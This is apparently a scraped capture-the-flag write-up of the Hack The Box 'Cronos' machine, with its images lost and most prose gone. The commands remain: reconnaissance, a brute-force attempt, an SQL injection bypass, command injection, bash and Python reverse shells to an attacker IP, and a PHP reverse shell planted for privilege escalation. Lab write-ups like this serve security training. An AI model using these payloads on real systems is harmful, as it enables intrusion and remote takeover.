Hack The Box — Cronos Writeup w/o Metasploit

Rana Khalil
Oct 25, 2019 · 10 min read
Image for post
Image for post

Reconnaissance

nmap -sC -sV -O -oA initial 10.10.10.13
Image for post
Image for post
nmap -sC -sV -O -p- -oA full 10.10.10.13
Image for post
Image for post
nmap -sU -O -p- -oA udp 10.10.10.13
Image for post
Image for post

Enumeration

Image for post
Image for post
Image for post
Image for post
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13
Image for post
Image for post
Image for post
Image for post
10.10.10.13 cronos.htb
Image for post
Image for post
host -l <domain-name> <dns_server-address>
host -l cronos.htb 10.10.10.13
Image for post
Image for post
10.10.10.13 cronos.htb www.cronos.htb admin.cronos.htb
Image for post
Image for post

Gaining an Initial Foothold

locate password | grep john
Image for post
Image for post
wc -l /usr/share/john/password.lst
Image for post
Image for post
Image for post
Image for post
hydra -l 'admin' -P /usr/share/john/password.lst admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&Login=Login:Your Login Name or Password is invalid"
admin' #
Image for post
Image for post
sqlmap -v 4 -r login.txt
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
8.8.8.8 & whoami
Image for post
Image for post
/bin/bash -i >& /dev/tcp/10.10.14.6/4444 0>&1
Image for post
Image for post
nc -nlvp 4444
which bash
Image for post
Image for post
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Image for post
Image for post
Image for post
Image for post
python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
Image for post
Image for post

Privilege Escalation

python -m SimpleHTTPServer 5555
cd /tmp
wget http://10.10.14.6:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
cp php-reverse-shell.php artisan
nc -nlvp 1234
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

Lessons Learned

Conclusion

Image for post
Image for post

The Startup

Medium's largest active publication, followed by +705K people. Follow to join our community.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store